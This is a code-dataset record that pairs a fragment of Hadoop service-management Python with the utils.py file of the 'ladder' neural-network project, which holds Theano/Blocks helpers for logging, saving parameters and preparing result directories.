format("{pid_dir}/hadoop-{user}-{name}.pid") hadoop_env_exports = { 'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir } log_dir = format("{hdfs_log_dir_prefix}/{user}") # NFS GATEWAY is always started by root using jsvc due to rpcbind bugs # on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542 if name == "nfs3" : import status_params pid_file = status_params.nfsgateway_pid_file custom_export = { 'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user, 'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir, 'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir } hadoop_env_exports.update(custom_export) process_id_exists_command = as_sudo(["test", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file]) # on STOP directories shouldn't be created # since during stop still old dirs are used (which were created
arasmus/ladder
utils.py
Python
mit
5,079
0.000788
import os import logging import numpy as np import theano from pandas import DataFrame, read_hdf from blocks.extensions import Printing, SimpleExtension from blocks.main_loop import MainLoop from blocks.roles import add_role logger = logging.getLogger('main.utils') def shared_param(init, name, cast_float32, role, **kwargs): if cast_float32: v = np.float32(init) p = theano.shared(v, name=name, **kwargs) add_role(p, role) return p class AttributeDict(dict): __getattr__ = dict.__getitem__ def __setattr__(self, a, b): self.__setitem__(a, b) class DummyLoop(MainLoop): def __init__(self, extensions): return super(DummyLoop, self).__init__(algorithm=None, data_stream=None, extensions=extensions) def run(self): for extension in self.extensions: extension.main_loop = self self._run_extensions('before_training') self._run_extensions('after_training') class ShortPrinting(Printing): def __init__(self, to_print, use_log=True, **kwargs): self.to_print = to_print self.use_log = use_log super(ShortPrinting, self).__init__(**kwargs) def do(self, which_callback, *args): log = self.main_loop.log # Iteration msg = "e {}, i {}:".format( log.status['epochs_done'], log.status['iterations_done']) # Requested channels items = [] for k, vars in self.to_print.iteritems(): for shortname, vars in vars.iteritems(): if vars is None: continue if type(vars) is not list: vars = [vars] s = "" for var in vars: try: name = k + '_' + var.name val = log.current_row[name] except: continue try: s += ' ' + ' '.join(["%.3g" % v for v in val]) except: s += " %.3g" % val if s != "": items += [shortname + s] msg = msg + ", ".join(items) if self.use_log: logger.info(msg) else: print msg class SaveParams(SimpleExtension): """Finishes the training process when triggered.""" def __init__(self, trigger_var, params, save_path, **kwargs): super(SaveParams, self).__init__(**kwargs) if trigger_var is None: self.var_name = None else: self.var_name = trigger_var[0] + '_' + trigger_var[1].name self.save_path = save_path self.params = params self.to_save = {} self.best_value = None self.add_condition(['after_training'], self.save) self.add_condition(['on_interrupt'], self.save) def sa
ve(self, which_callback, *args): if self.var_name is None: self.to_save = {v.name: v.get_value() for v in self.params} path = self.save_path + '/trained_params' logger.info('Saving to %s' % path) np.savez_compressed(path, **self.to_save) def do(self, w
hich_callback, *args): if self.var_name is None: return val = self.main_loop.log.current_row[self.var_name] if self.best_value is None or val < self.best_value: self.best_value = val self.to_save = {v.name: v.get_value() for v in self.params} class SaveExpParams(SimpleExtension): def __init__(self, experiment_params, dir, **kwargs): super(SaveExpParams, self).__init__(**kwargs) self.dir = dir self.experiment_params = experiment_params def do(self, which_callback, *args): df = DataFrame.from_dict(self.experiment_params, orient='index') df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w', complevel=5, complib='blosc') class SaveLog(SimpleExtension): def __init__(self, dir, show=None, **kwargs): super(SaveLog, self).__init__(**kwargs) self.dir = dir self.show = show if show is not None else [] def do(self, which_callback, *args): df = DataFrame.from_dict(self.main_loop.log, orient='index') df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w', complevel=5, complib='blosc') def prepare_dir(save_to, results_dir='results'): base = os.path.join(results_dir, save_to) i = 0 while True: name = base + str(i) try: os.makedirs(name) break except: i += 1 return name def load_df(dirpath, filename, varname=None): varname = filename if varname is None else varname fn = os.path.join(dirpath, filename) return read_hdf(fn, varname) def filter_funcs_prefix(d, pfx): pfx = 'cmd_' fp = lambda x: x.find(pfx) return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}